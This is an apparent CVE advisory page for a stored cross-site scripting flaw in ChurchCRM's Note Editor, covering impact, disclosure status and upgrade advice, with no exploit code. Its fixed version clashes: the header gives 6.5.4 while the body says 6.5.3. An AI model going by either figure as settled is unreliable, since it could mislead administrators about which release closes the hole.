Platform
php
Component
churchcrm
Fixed in
6.5.4
CVE-2026-35574 describes a stored Cross-Site Scripting (XSS) vulnerability within ChurchCRM, an open-source church management system. This vulnerability allows authenticated users with note-adding permissions to inject malicious JavaScript code, impacting other users, including administrators. The vulnerability affects versions 6.5.0 through 6.5.2 and has been resolved in version 6.5.3.
An attacker exploiting this XSS vulnerability could execute arbitrary JavaScript code within the browsers of other ChurchCRM users. This presents a significant risk of session hijacking, allowing the attacker to impersonate legitimate users and gain unauthorized access to sensitive church member data. The potential impact extends to administrators, enabling privilege escalation and complete control over the ChurchCRM instance. Successful exploitation could lead to data breaches, defacement of the application, and disruption of church operations. While the vulnerability requires authentication, the ease of note creation in many ChurchCRM configurations could make it relatively accessible to malicious actors.
CVE-2026-35574 was publicly disclosed on 2026-04-07. No public proof-of-concept (POC) code has been released at the time of writing, but the XSS nature of the vulnerability makes it likely that a POC will emerge. The vulnerability is not currently listed on CISA KEV. Given the ease of exploitation inherent in XSS vulnerabilities, and the potential for data compromise, it is prudent to prioritize remediation.
Exploit Status
EPSS
0.03% (9% percentile)
CISA SSVC
The primary mitigation for CVE-2026-35574 is to immediately upgrade ChurchCRM to version 6.5.3 or later. If upgrading is not immediately feasible, consider implementing strict input validation and output encoding on all user-supplied data within the Note Editor. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can provide an additional layer of defense. Regularly review ChurchCRM configurations to ensure that note-adding permissions are granted only to authorized personnel.
Actualice ChurchCRM a la versión 6.5.3 o posterior para mitigar la vulnerabilidad de XSS. Asegúrese de realizar una copia de seguridad de su base de datos antes de actualizar. Revise los registros de auditoría para detectar cualquier actividad sospechosa después de la actualización.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-35574 is a stored Cross-Site Scripting (XSS) vulnerability in ChurchCRM versions 6.5.0 through 6.5.2, allowing attackers to execute JavaScript code.
You are affected if you are running ChurchCRM versions 6.5.0, 6.5.1, or 6.5.2. Upgrade to 6.5.3 to mitigate the risk.
Upgrade ChurchCRM to version 6.5.3 or later. Implement input validation and output encoding as an interim measure.
While no active exploitation has been confirmed, the XSS nature of the vulnerability suggests a high likelihood of exploitation if left unpatched.
Refer to the ChurchCRM security advisories on their official website or GitHub repository for the latest information.
CVSS Vector
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.